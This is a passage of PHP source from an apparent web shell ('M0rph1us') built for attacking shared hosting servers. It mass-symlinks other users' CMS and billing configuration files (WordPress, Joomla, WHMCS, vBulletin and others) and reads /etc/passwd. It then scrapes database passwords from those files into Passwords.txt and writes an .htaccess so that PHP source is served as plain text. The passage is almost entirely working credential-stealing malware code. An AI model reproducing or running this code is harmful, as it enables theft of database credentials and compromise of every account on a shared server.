2989. @symlink('/home3/'.$user.'/public_html/Clients/configuration.php',$user.'-WHMCS.txt');
2990. @symlink('/home3/'.$user.'/public_html/clients/configuration.php',$user.'-WHMCS.txt');
2991. @symlink('/home3/'.$user.'/public_html/BILLINGS/configuration.php',$user.'-WHMCS.txt');
2992. @symlink('/home3/'.$user.'/public_html/Billings/configuration.php',$user.'-WHMCS.txt');
2993. @symlink('/home3/'.$user.'/public_html/billings/configuration.php',$user.'-WHMCS.txt');
2994. @symlink('/home3/'.$user.'/public_html/MY/configuration.php',$user.'-WHMCS.txt');
2995. @symlink('/home3/'.$user.'/public_html/My/configuration.php',$user.'-WHMCS.txt');
2996. @symlink('/home3/'.$user.'/public_html/my/configuration.php',$user.'-WHMCS.txt');
2997. @symlink('/home3/'.$user.'/public_html/secure/whm/configuration.php',$user.'-WHMCS.txt');
2998. @symlink('/home3/'.$user.'/public_html/secure/whmcs/configuration.php',$user.'-WHMCS.txt');
2999. @symlink('/home3/'.$user.'/public_html/panel/configuration.php',$user.'-WHMCS.txt');
3000. @symlink('/home3/'.$user.'/public_html/clientes/configuration.php',$user.'-WHMCS.txt');
3001. @symlink('/home3/'.$user.'/public_html/cliente/configuration.php',$user.'-WHMCS.txt');
3002. @symlink('/home3/'.$user.'/public_html/support/order/configuration.php',$user.'-WHMCS.txt');
3003. @symlink('/home3/'.$user.'/public_html/bb-config.php',$user.'-BoxBilling.txt');
3004. @symlink('/home3/'.$user.'/public_html/boxbilling/bb-config.php',$user.'-BoxBilling.txt');
3005. @symlink('/home3/'.$user.'/public_html/box/bb-config.php',$user.'-BoxBilling.txt');
3006. @symlink('/home3/'.$user.'/public_html/host/bb-config.php',$user.'-BoxBilling.txt');
3007. @symlink('/home3/'.$user.'/public_html/Host/bb-config.php',$user.'-BoxBilling.txt');
3008. @symlink('/home3/'.$user.'/public_html/supportes/bb-config.php',$user.'-BoxBilling.txt');
3009. @symlink('/home3/'.$user.'/public_html/support/bb-config.php',$user.'-BoxBilling.txt');
3010. @symlink('/home3/'.$user.'/public_html/hosting/bb-config.php',$user.'-BoxBilling.txt');
3011. @symlink('/home3/'.$user.'/public_html/cart/bb-config.php',$user.'-BoxBilling.txt');
3012. @symlink('/home3/'.$user.'/public_html/order/bb-config.php',$user.'-BoxBilling.txt');
3013. @symlink('/home3/'.$user.'/public_html/client/bb-config.php',$user.'-BoxBilling.txt');
3014. @symlink('/home3/'.$user.'/public_html/clients/bb-config.php',$user.'-BoxBilling.txt');
3015. @symlink('/home3/'.$user.'/public_html/cliente/bb-config.php',$user.'-BoxBilling.txt');
3016. @symlink('/home3/'.$user.'/public_html/clientes/bb-config.php',$user.'-BoxBilling.txt');
3017. @symlink('/home3/'.$user.'/public_html/billing/bb-config.php',$user.'-BoxBilling.txt');
3018. @symlink('/home3/'.$user.'/public_html/billings/bb-config.php',$user.'-BoxBilling.txt');
3019. @symlink('/home3/'.$user.'/public_html/my/bb-config.php',$user.'-BoxBilling.txt');
3020. @symlink('/home3/'.$user.'/public_html/secure/bb-config.php',$user.'-BoxBilling.txt');
3021. @symlink('/home3/'.$user.'/public_html/support/order/bb-config.php',$user.'-BoxBilling.txt');
3022. @symlink('/home3/'.$user.'/public_html/includes/dist-configure.php',$user.'-Zencart.txt');
3023. @symlink('/home3/'.$user.'/public_html/zencart/includes/dist-configure.php',$user.'-Zencart.txt');
3024. @symlink('/home3/'.$user.'/public_html/products/includes/dist-configure.php',$user.'-Zencart.txt');
3025. @symlink('/home3/'.$user.'/public_html/cart/includes/dist-configure.php',$user.'-Zencart.txt');
3026. @symlink('/home3/'.$user.'/public_html/shop/includes/dist-configure.php',$user.'-Zencart.txt');
3027. @symlink('/home3/'.$user.'/public_html/includes/iso4217.php',$user.'-Hostbills.txt');
3028. @symlink('/home3/'.$user.'/public_html/hostbills/includes/iso4217.php',$user.'-Hostbills.txt');
3029. @symlink('/home3/'.$user.'/public_html/host/includes/iso4217.php',$user.'-Hostbills.txt');
3030. @symlink('/home3/'.$user.'/public_html/Host/includes/iso4217.php',$user.'-Hostbills.txt');
3031. @symlink('/home3/'.$user.'/public_html/supportes/includes/iso4217.php',$user.'-Hostbills.txt');
3032. @symlink('/home3/'.$user.'/public_html/support/includes/iso4217.php',$user.'-Hostbills.txt');
3033. @symlink('/home3/'.$user.'/public_html/hosting/includes/iso4217.php',$user.'-Hostbills.txt');
3034. @symlink('/home3/'.$user.'/public_html/cart/includes/iso4217.php',$user.'-Hostbills.txt');
3035. @symlink('/home3/'.$user.'/public_html/order/includes/iso4217.php',$user.'-Hostbills.txt');
3036. @symlink('/home3/'.$user.'/public_html/client/includes/iso4217.php',$user.'-Hostbills.txt');
3037. @symlink('/home3/'.$user.'/public_html/clients/includes/iso4217.php',$user.'-Hostbills.txt');
3038. @symlink('/home3/'.$user.'/public_html/cliente/includes/iso4217.php',$user.'-Hostbills.txt');
3039. @symlink('/home3/'.$user.'/public_html/clientes/includes/iso4217.php',$user.'-Hostbills.txt');
3040. @symlink('/home3/'.$user.'/public_html/billing/includes/iso4217.php',$user.'-Hostbills.txt');
3041. @symlink('/home3/'.$user.'/public_html/billings/includes/iso4217.php',$user.'-Hostbills.txt');
3042. @symlink('/home3/'.$user.'/public_html/my/includes/iso4217.php',$user.'-Hostbills.txt');
3043. @symlink('/home3/'.$user.'/public_html/secure/includes/iso4217.php',$user.'-Hostbills.txt');
3044. @symlink('/home3/'.$user.'/public_html/support/order/includes/iso4217.php',$user.'-Hostbills.txt');
3045.  
3046. //Home4
3047.  
3048. @symlink('/home4/'.$user.'/public_html/vb/includes/config.php',$user.'-Vbulletin.txt');
3049. @symlink('/home4/'.$user.'/public_html/includes/config.php',$user.'-Vbulletin.txt');
3050. @symlink('/home4/'.$user.'/public_html/forum/includes/config.php',$user.'-Vbulletin.txt');
3051. @symlink('/home4/'.$user.'/public_html/forums/includes/config.php',$user.'-Vbulletin.txt');
3052. @symlink('/home4/'.$user.'/public_html/cc/includes/config.php',$user.'-Vbulletin.txt');
3053. @symlink('/home4/'.$user.'/public_html/inc/config.php',$user.'-MyBB.txt');
3054. @symlink('/home4/'.$user.'/public_html/includes/configure.php',$user.'-OsCommerce.txt');
3055. @symlink('/home4/'.$user.'/public_html/shop/includes/configure.php',$user.'-OsCommerce.txt');
3056. @symlink('/home4/'.$user.'/public_html/os/includes/configure.php',$user.'-OsCommerce.txt');
3057. @symlink('/home4/'.$user.'/public_html/oscom/includes/configure.php',$user.'-OsCommerce.txt');
3058. @symlink('/home4/'.$user.'/public_html/products/includes/configure.php',$user.'-OsCommerce.txt');
3059. @symlink('/home4/'.$user.'/public_html/cart/includes/configure.php',$user.'-OsCommerce.txt');
3060. @symlink('/home4/'.$user.'/public_html/inc/conf_global.php',$user.'-IPB.txt');
3061. @symlink('/home4/'.$user.'/public_html/wp-config.php',$user.'-Wordpress.txt');
3062. @symlink('/home4/'.$user.'/public_html/wp/test/wp-config.php',$user.'-Wordpress.txt');
3063. @symlink('/home4/'.$user.'/public_html/blog/wp-config.php',$user.'-Wordpress.txt');
3064. @symlink('/home4/'.$user.'/public_html/beta/wp-config.php',$user.'-Wordpress.txt');
3065. @symlink('/home4/'.$user.'/public_html/portal/wp-config.php',$user.'-Wordpress.txt');
3066. @symlink('/home4/'.$user.'/public_html/site/wp-config.php',$user.'-Wordpress.txt');
3067. @symlink('/home4/'.$user.'/public_html/wp/wp-config.php',$user.'-Wordpress.txt');
3068. @symlink('/home4/'.$user.'/public_html/WP/wp-config.php',$user.'-Wordpress.txt');
3069. @symlink('/home4/'.$user.'/public_html/news/wp-config.php',$user.'-Wordpress.txt');
3070. @symlink('/home4/'.$user.'/public_html/wordpress/wp-config.php',$user.'-Wordpress.txt');
3071. @symlink('/home4/'.$user.'/public_html/test/wp-config.php',$user.'-Wordpress.txt');
3072. @symlink('/home4/'.$user.'/public_html/demo/wp-config.php',$user.'-Wordpress.txt');
3073. @symlink('/home4/'.$user.'/public_html/home/wp-config.php',$user.'-Wordpress.txt');
3074. @symlink('/home4/'.$user.'/public_html/v1/wp-config.php',$user.'-Wordpress.txt');
3075. @symlink('/home4/'.$user.'/public_html/v2/wp-config.php',$user.'-Wordpress.txt');
3076. @symlink('/home4/'.$user.'/public_html/press/wp-config.php',$user.'-Wordpress.txt');
3077. @symlink('/home4/'.$user.'/public_html/new/wp-config.php',$user.'-Wordpress.txt');
3078. @symlink('/home4/'.$user.'/public_html/blogs/wp-config.php',$user.'-Wordpress.txt');
3079. @symlink('/home4/'.$user.'/public_html/configuration.php',$user.'-Joomla.txt');
3080. @symlink('/home4/'.$user.'/public_html/blog/configuration.php',$user.'-Joomla.txt');
3081. @symlink('/home4/'.$user.'/public_html/submitticket.php',$user.'-^WHMCS.txt');
3082. @symlink('/home4/'.$user.'/public_html/cms/configuration.php',$user.'-Joomla.txt');
3083. @symlink('/home4/'.$user.'/public_html/beta/configuration.php',$user.'-Joomla.txt');
3084. @symlink('/home4/'.$user.'/public_html/portal/configuration.php',$user.'-Joomla.txt');
3085. @symlink('/home4/'.$user.'/public_html/site/configuration.php',$user.'-Joomla.txt');
3086. @symlink('/home4/'.$user.'/public_html/main/configuration.php',$user.'-Joomla.txt');
3087. @symlink('/home4/'.$user.'/public_html/home/configuration.php',$user.'-Joomla.txt');
3088. @symlink('/home4/'.$user.'/public_html/demo/configuration.php',$user.'-Joomla.txt');
3089. @symlink('/home4/'.$user.'/public_html/test/configuration.php',$user.'-Joomla.txt');
3090. @symlink('/home4/'.$user.'/public_html/v1/configuration.php',$user.'-Joomla.txt');
3091. @symlink('/home4/'.$user.'/public_html/v2/configuration.php',$user.'-Joomla.txt');
3092. @symlink('/home4/'.$user.'/public_html/joomla/configuration.php',$user.'-Joomla.txt');
3093. @symlink('/home4/'.$user.'/public_html/new/configuration.php',$user.'-Joomla.txt');
3094. @symlink('/home4/'.$user.'/public_html/WHMCS/configuration.php',$user.'-WHMCS.txt');
3095. @symlink('/home4/'.$user.'/public_html/whmcs1/configuration.php',$user.'-WHMCS.txt');
3096. @symlink('/home4/'.$user.'/public_html/Whmcs/configuration.php',$user.'-WHMCS.txt');
3097. @symlink('/home4/'.$user.'/public_html/whmcs/configuration.php',$user.'-WHMCS.txt');
3098. @symlink('/home4/'.$user.'/public_html/whmcs/configuration.php',$user.'-WHMCS.txt');
3099. @symlink('/home4/'.$user.'/public_html/WHMC/configuration.php',$user.'-WHMCS.txt');
3100. @symlink('/home4/'.$user.'/public_html/Whmc/configuration.php',$user.'-WHMCS.txt');
3101. @symlink('/home4/'.$user.'/public_html/whmc/configuration.php',$user.'-WHMCS.txt');
3102. @symlink('/home4/'.$user.'/public_html/WHM/configuration.php',$user.'-WHMCS.txt');
3103. @symlink('/home4/'.$user.'/public_html/Whm/configuration.php',$user.'-WHMCS.txt');
3104. @symlink('/home4/'.$user.'/public_html/whm/configuration.php',$user.'-WHMCS.txt');
3105. @symlink('/home4/'.$user.'/public_html/HOST/configuration.php',$user.'-WHMCS.txt');
3106. @symlink('/home4/'.$user.'/public_html/Host/configuration.php',$user.'-WHMCS.txt');
3107. @symlink('/home4/'.$user.'/public_html/host/configuration.php',$user.'-WHMCS.txt');
3108. @symlink('/home4/'.$user.'/public_html/SUPPORTES/configuration.php',$user.'-WHMCS.txt');
3109. @symlink('/home4/'.$user.'/public_html/Supportes/configuration.php',$user.'-WHMCS.txt');
3110. @symlink('/home4/'.$user.'/public_html/supportes/configuration.php',$user.'-WHMCS.txt');
3111. @symlink('/home4/'.$user.'/public_html/domains/configuration.php',$user.'-WHMCS.txt');
3112. @symlink('/home4/'.$user.'/public_html/domain/configuration.php',$user.'-WHMCS.txt');
3113. @symlink('/home4/'.$user.'/public_html/Hosting/configuration.php',$user.'-WHMCS.txt');
3114. @symlink('/home4/'.$user.'/public_html/HOSTING/configuration.php',$user.'-WHMCS.txt');
3115. @symlink('/home4/'.$user.'/public_html/hosting/configuration.php',$user.'-WHMCS.txt');
3116. @symlink('/home4/'.$user.'/public_html/CART/configuration.php',$user.'-WHMCS.txt');
3117. @symlink('/home4/'.$user.'/public_html/Cart/configuration.php',$user.'-WHMCS.txt');
3118. @symlink('/home4/'.$user.'/public_html/cart/configuration.php',$user.'-WHMCS.txt');
3119. @symlink('/home4/'.$user.'/public_html/ORDER/configuration.php',$user.'-WHMCS.txt');
3120. @symlink('/home4/'.$user.'/public_html/Order/configuration.php',$user.'-WHMCS.txt');
3121. @symlink('/home4/'.$user.'/public_html/order/configuration.php',$user.'-WHMCS.txt');
3122. @symlink('/home4/'.$user.'/public_html/CLIENT/configuration.php',$user.'-WHMCS.txt');
3123. @symlink('/home4/'.$user.'/public_html/Client/configuration.php',$user.'-WHMCS.txt');
3124. @symlink('/home4/'.$user.'/public_html/client/configuration.php',$user.'-WHMCS.txt');
3125. @symlink('/home4/'.$user.'/public_html/CLIENTAREA/configuration.php',$user.'-WHMCS.txt');
3126. @symlink('/home4/'.$user.'/public_html/Clientarea/configuration.php',$user.'-WHMCS.txt');
3127. @symlink('/home4/'.$user.'/public_html/clientarea/configuration.php',$user.'-WHMCS.txt');
3128. @symlink('/home4/'.$user.'/public_html/SUPPORT/configuration.php',$user.'-WHMCS.txt');
3129. @symlink('/home4/'.$user.'/public_html/Support/configuration.php',$user.'-WHMCS.txt');
3130. @symlink('/home4/'.$user.'/public_html/support/configuration.php',$user.'-WHMCS.txt');
3131. @symlink('/home4/'.$user.'/public_html/BILLING/configuration.php',$user.'-WHMCS.txt');
3132. @symlink('/home4/'.$user.'/public_html/Billing/configuration.php',$user.'-WHMCS.txt');
3133. @symlink('/home4/'.$user.'/public_html/billing/configuration.php',$user.'-WHMCS.txt');
3134. @symlink('/home4/'.$user.'/public_html/BUY/configuration.php',$user.'-WHMCS.txt');
3135. @symlink('/home4/'.$user.'/public_html/Buy/configuration.php',$user.'-WHMCS.txt');
3136. @symlink('/home4/'.$user.'/public_html/buy/configuration.php',$user.'-WHMCS.txt');
3137. @symlink('/home4/'.$user.'/public_html/MANAGE/configuration.php',$user.'-WHMCS.txt');
3138. @symlink('/home4/'.$user.'/public_html/Manage/configuration.php',$user.'-WHMCS.txt');
3139. @symlink('/home4/'.$user.'/public_html/manage/configuration.php',$user.'-WHMCS.txt');
3140. @symlink('/home4/'.$user.'/public_html/CLIENTSUPPORT/configuration.php',$user.'-WHMCS.txt');
3141. @symlink('/home4/'.$user.'/public_html/ClientSupport/configuration.php',$user.'-WHMCS.txt');
3142. @symlink('/home4/'.$user.'/public_html/Clientsupport/configuration.php',$user.'-WHMCS.txt');
3143. @symlink('/home4/'.$user.'/public_html/clientsupport/configuration.php',$user.'-WHMCS.txt');
3144. @symlink('/home4/'.$user.'/public_html/CHECKOUT/configuration.php',$user.'-WHMCS.txt');
3145. @symlink('/home4/'.$user.'/public_html/Checkout/configuration.php',$user.'-WHMCS.txt');
3146. @symlink('/home4/'.$user.'/public_html/checkout/configuration.php',$user.'-WHMCS.txt');
3147. @symlink('/home4/'.$user.'/public_html/BILLINGS/configuration.php',$user.'-WHMCS.txt');
3148. @symlink('/home4/'.$user.'/public_html/Billings/configuration.php',$user.'-WHMCS.txt');
3149. @symlink('/home4/'.$user.'/public_html/billings/configuration.php',$user.'-WHMCS.txt');
3150. @symlink('/home4/'.$user.'/public_html/BASKET/configuration.php',$user.'-WHMCS.txt');
3151. @symlink('/home4/'.$user.'/public_html/Basket/configuration.php',$user.'-WHMCS.txt');
3152. @symlink('/home4/'.$user.'/public_html/basket/configuration.php',$user.'-WHMCS.txt');
3153. @symlink('/home4/'.$user.'/public_html/SECURE/configuration.php',$user.'-WHMCS.txt');
3154. @symlink('/home4/'.$user.'/public_html/Secure/configuration.php',$user.'-WHMCS.txt');
3155. @symlink('/home4/'.$user.'/public_html/secure/configuration.php',$user.'-WHMCS.txt');
3156. @symlink('/home4/'.$user.'/public_html/SALES/configuration.php',$user.'-WHMCS.txt');
3157. @symlink('/home4/'.$user.'/public_html/Sales/configuration.php',$user.'-WHMCS.txt');
3158. @symlink('/home4/'.$user.'/public_html/sales/configuration.php',$user.'-WHMCS.txt');
3159. @symlink('/home4/'.$user.'/public_html/BILL/configuration.php',$user.'-WHMCS.txt');
3160. @symlink('/home4/'.$user.'/public_html/Bill/configuration.php',$user.'-WHMCS.txt');
3161. @symlink('/home4/'.$user.'/public_html/bill/configuration.php',$user.'-WHMCS.txt');
3162. @symlink('/home4/'.$user.'/public_html/PURCHASE/configuration.php',$user.'-WHMCS.txt');
3163. @symlink('/home4/'.$user.'/public_html/Purchase/configuration.php',$user.'-WHMCS.txt');
3164. @symlink('/home4/'.$user.'/public_html/purchase/configuration.php',$user.'-WHMCS.txt');
3165. @symlink('/home4/'.$user.'/public_html/ACCOUNT/configuration.php',$user.'-WHMCS.txt');
3166. @symlink('/home4/'.$user.'/public_html/Account/configuration.php',$user.'-WHMCS.txt');
3167. @symlink('/home4/'.$user.'/public_html/account/configuration.php',$user.'-WHMCS.txt');
3168. @symlink('/home4/'.$user.'/public_html/USER/configuration.php',$user.'-WHMCS.txt');
3169. @symlink('/home4/'.$user.'/public_html/User/configuration.php',$user.'-WHMCS.txt');
3170. @symlink('/home4/'.$user.'/public_html/user/configuration.php',$user.'-WHMCS.txt');
3171. @symlink('/home4/'.$user.'/public_html/CLIENTS/configuration.php',$user.'-WHMCS.txt');
3172. @symlink('/home4/'.$user.'/public_html/Clients/configuration.php',$user.'-WHMCS.txt');
3173. @symlink('/home4/'.$user.'/public_html/clients/configuration.php',$user.'-WHMCS.txt');
3174. @symlink('/home4/'.$user.'/public_html/BILLINGS/configuration.php',$user.'-WHMCS.txt');
3175. @symlink('/home4/'.$user.'/public_html/Billings/configuration.php',$user.'-WHMCS.txt');
3176. @symlink('/home4/'.$user.'/public_html/billings/configuration.php',$user.'-WHMCS.txt');
3177. @symlink('/home4/'.$user.'/public_html/MY/configuration.php',$user.'-WHMCS.txt');
3178. @symlink('/home4/'.$user.'/public_html/My/configuration.php',$user.'-WHMCS.txt');
3179. @symlink('/home4/'.$user.'/public_html/my/configuration.php',$user.'-WHMCS.txt');
3180. @symlink('/home4/'.$user.'/public_html/secure/whm/configuration.php',$user.'-WHMCS.txt');
3181. @symlink('/home4/'.$user.'/public_html/secure/whmcs/configuration.php',$user.'-WHMCS.txt');
3182. @symlink('/home4/'.$user.'/public_html/panel/configuration.php',$user.'-WHMCS.txt');
3183. @symlink('/home4/'.$user.'/public_html/clientes/configuration.php',$user.'-WHMCS.txt');
3184. @symlink('/home4/'.$user.'/public_html/cliente/configuration.php',$user.'-WHMCS.txt');
3185. @symlink('/home4/'.$user.'/public_html/support/order/configuration.php',$user.'-WHMCS.txt');
3186. @symlink('/home4/'.$user.'/public_html/bb-config.php',$user.'-BoxBilling.txt');
3187. @symlink('/home4/'.$user.'/public_html/boxbilling/bb-config.php',$user.'-BoxBilling.txt');
3188. @symlink('/home4/'.$user.'/public_html/box/bb-config.php',$user.'-BoxBilling.txt');
3189. @symlink('/home4/'.$user.'/public_html/host/bb-config.php',$user.'-BoxBilling.txt');
3190. @symlink('/home4/'.$user.'/public_html/Host/bb-config.php',$user.'-BoxBilling.txt');
3191. @symlink('/home4/'.$user.'/public_html/supportes/bb-config.php',$user.'-BoxBilling.txt');
3192. @symlink('/home4/'.$user.'/public_html/support/bb-config.php',$user.'-BoxBilling.txt');
3193. @symlink('/home4/'.$user.'/public_html/hosting/bb-config.php',$user.'-BoxBilling.txt');
3194. @symlink('/home4/'.$user.'/public_html/cart/bb-config.php',$user.'-BoxBilling.txt');
3195. @symlink('/home4/'.$user.'/public_html/order/bb-config.php',$user.'-BoxBilling.txt');
3196. @symlink('/home4/'.$user.'/public_html/client/bb-config.php',$user.'-BoxBilling.txt');
3197. @symlink('/home4/'.$user.'/public_html/clients/bb-config.php',$user.'-BoxBilling.txt');
3198. @symlink('/home4/'.$user.'/public_html/cliente/bb-config.php',$user.'-BoxBilling.txt');
3199. @symlink('/home4/'.$user.'/public_html/clientes/bb-config.php',$user.'-BoxBilling.txt');
3200. @symlink('/home4/'.$user.'/public_html/billing/bb-config.php',$user.'-BoxBilling.txt');
3201. @symlink('/home4/'.$user.'/public_html/billings/bb-config.php',$user.'-BoxBilling.txt');
3202. @symlink('/home4/'.$user.'/public_html/my/bb-config.php',$user.'-BoxBilling.txt');
3203. @symlink('/home4/'.$user.'/public_html/secure/bb-config.php',$user.'-BoxBilling.txt');
3204. @symlink('/home4/'.$user.'/public_html/support/order/bb-config.php',$user.'-BoxBilling.txt');
3205. @symlink('/home4/'.$user.'/public_html/includes/dist-configure.php',$user.'-Zencart.txt');
3206. @symlink('/home4/'.$user.'/public_html/zencart/includes/dist-configure.php',$user.'-Zencart.txt');
3207. @symlink('/home4/'.$user.'/public_html/products/includes/dist-configure.php',$user.'-Zencart.txt');
3208. @symlink('/home4/'.$user.'/public_html/cart/includes/dist-configure.php',$user.'-Zencart.txt');
3209. @symlink('/home4/'.$user.'/public_html/shop/includes/dist-configure.php',$user.'-Zencart.txt');
3210. @symlink('/home4/'.$user.'/public_html/includes/iso4217.php',$user.'-Hostbills.txt');
3211. @symlink('/home4/'.$user.'/public_html/hostbills/includes/iso4217.php',$user.'-Hostbills.txt');
3212. @symlink('/home4/'.$user.'/public_html/host/includes/iso4217.php',$user.'-Hostbills.txt');
3213. @symlink('/home4/'.$user.'/public_html/Host/includes/iso4217.php',$user.'-Hostbills.txt');
3214. @symlink('/home4/'.$user.'/public_html/supportes/includes/iso4217.php',$user.'-Hostbills.txt');
3215. @symlink('/home4/'.$user.'/public_html/support/includes/iso4217.php',$user.'-Hostbills.txt');
3216. @symlink('/home4/'.$user.'/public_html/hosting/includes/iso4217.php',$user.'-Hostbills.txt');
3217. @symlink('/home4/'.$user.'/public_html/cart/includes/iso4217.php',$user.'-Hostbills.txt');
3218. @symlink('/home4/'.$user.'/public_html/order/includes/iso4217.php',$user.'-Hostbills.txt');
3219. @symlink('/home4/'.$user.'/public_html/client/includes/iso4217.php',$user.'-Hostbills.txt');
3220. @symlink('/home4/'.$user.'/public_html/clients/includes/iso4217.php',$user.'-Hostbills.txt');
3221. @symlink('/home4/'.$user.'/public_html/cliente/includes/iso4217.php',$user.'-Hostbills.txt');
3222. @symlink('/home4/'.$user.'/public_html/clientes/includes/iso4217.php',$user.'-Hostbills.txt');
3223. @symlink('/home4/'.$user.'/public_html/billing/includes/iso4217.php',$user.'-Hostbills.txt');
3224. @symlink('/home4/'.$user.'/public_html/billings/includes/iso4217.php',$user.'-Hostbills.txt');
3225. @symlink('/home4/'.$user.'/public_html/my/includes/iso4217.php',$user.'-Hostbills.txt');
3226. @symlink('/home4/'.$user.'/public_html/secure/includes/iso4217.php',$user.'-Hostbills.txt');
3227. @symlink('/home4/'.$user.'/public_html/support/order/includes/iso4217.php',$user.'-Hostbills.txt');
3228.  
3229. }
3230.  
3231. //password grab
3232.  
3233. function entre2v2($text,$marqueurDebutLien,$marqueurFinLien)
3234. {
3235.  
3236. $ar0=explode($marqueurDebutLien, $text);
3237. $ar1=explode($marqueurFinLien, $ar0[1]);
3238. $ar=trim($ar1[0]);
3239. return $ar;
3240. }
3241.  
3242. $ffile=fopen('Passwords.txt','a+');
3243.  
3244.  
3245. $r= 'http://'.$_SERVER['SERVER_NAME'].dirname($_SERVER['SCRIPT_NAME'])."/M0rph1us_sym/";
3246. $re=$r;
3247. $confi=array("-Wordpress.txt","-Joomla.txt","-WHMCS.txt","-Vbulletin.txt","-Other.txt","-Zencart.txt","-Hostbills.txt","-SMF.txt","-Drupal.txt","-OsCommerce.txt","-MyBB.txt","-PHPBB.txt","-IPB.txt","-BoxBilling.txt");
3248.  
3249. $users=file("/etc/passwd");
3250. foreach($users as $user)
3251. {
3252.  
3253. $str=explode(":",$user);
3254. $usersss=$str[0];
3255. foreach($confi as $co)
3256. {
3257.  
3258.  
3259. $uurl=$re.$usersss.$co;
3260. $uel=$uurl;
3261.  
3262. $ch = curl_init();
3263.  
3264. curl_setopt($ch, CURLOPT_URL, $uel);
3265. curl_setopt($ch, CURLOPT_HEADER, 1);
3266. curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
3267. curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 5);
3268. curl_setopt($ch, CURLOPT_USERAGENT, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.8) Gecko/2009032609 Firefox/3.0.8');
3269. $result['EXE'] = curl_exec($ch);
3270. curl_close($ch);
3271. $uxl=$result['EXE'];
3272.  
3273.  
3274. if($uxl && preg_match('/table_prefix/i',$uxl))
3275. {
3276.  
3277. //Wordpress
3278.  
3279. $dbp=entre2v2($uxl,"DB_PASSWORD', '","');");
3280. if(!empty($dbp))
3281. $pass=$dbp."\n";
3282. fwrite($ffile,$pass);
3283.  
3284. }
3285. elseif($uxl && preg_match('/cc_encryption_hash/i',$uxl))
3286. {
3287.  
3288. //WHMCS
3289.  
3290. $dbp=entre2v2($uxl,"db_password = '","';");
3291. if(!empty($dbp))
3292. $pass=$dbp."\n";
3293. fwrite($ffile,$pass);
3294.  
3295. }
3296.  
3297.  
3298. elseif($uxl && preg_match('/dbprefix/i',$uxl))
3299. {
3300.  
3301. //Joomla
3302.  
3303. $db=entre2v2($uxl,"password = '","';");
3304. if(!empty($db))
3305. $pass=$db."\n";
3306. fwrite($ffile,$pass);
3307. }
3308. elseif($uxl && preg_match('/admincpdir/i',$uxl))
3309. {
3310.  
3311. //Vbulletin
3312.  
3313. $db=entre2v2($uxl,"password'] = '","';");
3314. if(!empty($db))
3315. $pass=$db."\n";
3316. fwrite($ffile,$pass);
3317.  
3318. }
3319. elseif($uxl && preg_match('/DB_DATABASE/i',$uxl))
3320. {
3321.  
3322. //Other
3323.  
3324. $db=entre2v2($uxl,"DB_PASSWORD', '","');");
3325. if(!empty($db))
3326. $pass=$db."\n";
3327. fwrite($ffile,$pass);
3328. }
3329. elseif($uxl && preg_match('/dbpass/i',$uxl))
3330. {
3331.  
3332. //Other
3333.  
3334. $db=entre2v2($uxl,"dbpass = '","';");
3335. if(!empty($db))
3336. $pass=$db."\n";
3337. fwrite($ffile,$pass);
3338. }
3339. elseif($uxl && preg_match('/dbpass/i',$uxl))
3340. {
3341.  
3342. //Other
3343.  
3344. $db=entre2v2($uxl,"dbpass = '","';");
3345. if(!empty($db))
3346. $pass=$db."\n";
3347. fwrite($ffile,$pass);
3348.  
3349. }
3350. elseif($uxl && preg_match('/dbpass/i',$uxl))
3351. {
3352.  
3353. //Other
3354.  
3355. $db=entre2v2($uxl,"dbpass = \"","\";");
3356. if(!empty($db))
3357. $pass=$db."\n";
3358. fwrite($ffile,$pass);
3359. }
3360.  
3361.  
3362. }
3363. }
3364. echo "<center>
3365. <a href=\"M0rph1us_sym/root/\">Root Server</a>
3366. <br><a href=\"M0rph1us_sym/Passwords.txt\">Passwords</a>
3367. <br><a href=\"M0rph1us_sym/\">Configurations</a></center>";
3368. }
3369. else
3370. {
3371. echo "<center>
3372. <form method=\"POST\">
3373. <textarea name=\"passwd\" class='area' rows='15' cols='60'>";
3374. $file = '/etc/passwd';
3375. $read = @fopen($file, 'r');
3376. if ($read){
3377. $body = @fread($read, @filesize($file));
3378. echo "".htmlentities($body)."";
3379. }
3380. elseif(!$read)
3381. {
3382. $read = @show_source($file) ;
3383. }
3384. elseif(!$read)
3385. {
3386. $read = @highlight_file($file);
3387. }
3388. elseif(!$read)
3389. {
3390. for($uid=0;$uid<1000;$uid++)
3391. {
3392. $ara = posix_getpwuid($uid);
3393. if (!empty($ara))
3394. {
3395. while (list ($key, $val) = each($ara))
3396. {
3397. print "$val:";
3398. }
3399. print "\n";
3400. }}}
3401.  
3402. flush();
3403.  
3404. echo "</textarea>
3405. <p><input name=\"m\" size=\"80\" value=\"Start\" type=\"submit\"/></p>
3406. </form></center>";
3407. }
3408. }
3409. }
3410. elseif($_GET['do'] == 'symlink') {
3411. $full = str_replace($_SERVER['DOCUMENT_ROOT'], "", $dir);
3412. $d0mains = @file("/etc/named.conf");
3413. ##httaces
3414. if($d0mains){
3415. @mkdir("M0rph1us_sym",0777);
3416. @chdir("M0rph1us_sym");
3417. @exe("ln -s / root");
3418. $file3 = 'Options Indexes FollowSymLinks
3419. DirectoryIndex M0rph1us.htm
3420. AddType text/plain .php
3421. AddHandler text/plain .php
3422. Satisfy Any';
3423. $fp3 = fopen('.htaccess','w');
3424. $fw3 = fwrite($fp3,$file3);@fclose($fp3);
3425. echo "
3426. <table align=center border=1 style='width:60%;border-color:#333333;'>
3427. <tr>
3428. <td align=center><font size=2>S. No.</font></td>
3429. <td align=center><font size=2>Domains</font></td>
3430. <td align=center><font size=2>Users</font></td>
3431. <td align=center><font size=2>Symlink</font></td>
3432. </tr>";
3433. $dcount = 1;
3434. foreach($d0mains as $d0main){
3435. if(eregi("zone",$d0main)){preg_match_all('#zone "(.*)"#', $d0main, $domains);
3436. flush();
3437. if(strlen(trim($domains[1][0])) > 2){
3438. $user = posix_getpwuid(@fileowner("/etc/valiases/".$domains[1][0]));
3439. echo "<tr align=center><td><font size=2>" . $dcount . "</font></td>
3440. <td align=left><a href=http://www.".$domains[1][0]."/><font class=txt>".$domains[1][0]."</font></a></td>
3441. <td>".$user['name']."</td>
3442. <td><a href='$full/M0rph1us_sym/root/home/".$user['name']."/public_html' target='_blank'><font class=txt>Symlink</font></a></td></tr>";
3443. flush();
3444. $dcount++;}}}
3445. echo "</table>";
3446. }else{
3447. $TEST=@file('/etc/passwd');
3448. if ($TEST){
3449. @mkdir("M0rph1us_sym",0777);
3450. @chdir("M0rph1us_sym");
3451. exe("ln -s / root");
3452. $file3 = 'Options Indexes FollowSymLinks
3453. DirectoryIndex M0rph1us.htm
